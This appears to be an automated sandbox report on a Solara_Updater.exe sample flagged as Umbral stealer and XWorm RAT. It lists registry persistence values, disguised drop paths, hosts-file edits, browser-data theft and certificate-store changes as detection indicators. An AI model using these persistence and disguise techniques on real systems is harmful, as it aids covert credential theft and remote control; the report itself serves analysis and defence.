Malware Analysis Report

2024-10-10 10:03

Sample ID 240519-tpx5faef98
Target Solara_Updater.exe
SHA256 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
Tags
umbral xworm execution persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

Threat Level: Known bad

The file Solara_Updater.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan

Detect Xworm Payload

Modifies WinLogon for persistence

Umbral

Detect Umbral payload

Process spawned unexpected child process

Xworm

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Drops startup file

Looks up external IP address via web service

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Views/modifies file attributes

Runs ping.exe

Modifies registry class

Detects videocard installed

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-19 16:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 16:14

Reported

2024-05-19 16:17

Platform

win7-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Program Files (x86)\Common Files\Services\wscript.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\hccjfr.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Common Files\Services\wscript.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\Common Files\Services\817c8c8ec737a7 C:\hostNet\bridgeblockportComBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\L2Schemas\WmiPrvSE.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File opened for modification C:\Windows\L2Schemas\WmiPrvSE.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\L2Schemas\24dbde2999530e C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\69ddcba757bf72 C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\hostNet\bridgeblockportComBroker.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
